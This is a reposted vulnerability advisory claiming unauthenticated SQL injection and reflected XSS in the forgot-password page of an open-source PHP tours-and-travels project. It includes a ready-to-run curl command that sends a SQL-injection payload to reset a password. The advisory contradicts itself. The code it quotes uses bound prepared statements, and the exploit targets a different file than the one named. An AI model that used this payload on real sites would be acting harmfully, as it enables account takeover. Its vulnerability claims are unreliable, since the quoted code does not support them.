Tours and travels PHP Multiple Vulnerabilities
在线旅游和旅行项目的PHP代码存在未认证的SQL注入和XSS漏洞,主要集中在`forgot-password.php`文件中。SQL注入允许攻击者通过恶意输入控制数据库查询,而XSS则使攻击者能够在用户界面中注入恶意脚本代码。 2025-3-20 20:37:57 Author: cxsecurity.com(查看原文) 阅读量:13 收藏

Tours and travels PHP Multiple Vulnerabilities

# Exploit Title: online-tours-travels-project Multiple Vulnerabilities # Date: 23-02-2025 # Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-tours-travels-project-php/ # Software Link: https://github.com/projectworldsofficial/Tours-and-travels-in-php # Description: The SQLi and the XSS are unauthenticated and in forgot-password.php # Tested on: Ubuntu 24.04.2 LTS, XAMPP, Apache, MySQL in this file : https://github.com/projectworldsofficial/Tours-and-travels-in-php/blob/master/forgot-password.php [Unauthenticated SQL Injection ] When updating the password, the query is not sanitized or validated properly. $email=$_POST['email']; $mobile=$_POST['mobile']; $newpassword=md5($_POST['newpassword']); $sql ="SELECT EmailId FROM tblusers WHERE EmailId=:email and MobileNumber=:mobile"; $query= $dbh -> prepare($sql); $query-> bindParam(':email', $email, PDO::PARAM_STR); $query-> bindParam(':mobile', $mobile, PDO::PARAM_STR); $query-> execute(); $results = $query -> fetchAll(PDO::FETCH_OBJ); exploit : curl --location 'localhost/Tours-and-travels-in-php/reset-password.php' \ --header 'Content-Type: application/x-www-form-urlencoded' \ --data-urlencode '[email protected]\'; -- ' \ --data-urlencode 'mobile=1234567890' \ --data-urlencode 'newpassword=newpassword' [Cross Site Scripting] XSS vulnerability is present in input fields email & mobile where user input is directly reflected back in the output without proper encoding.



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2025030020
如有侵权请联系:admin#unsafe.sh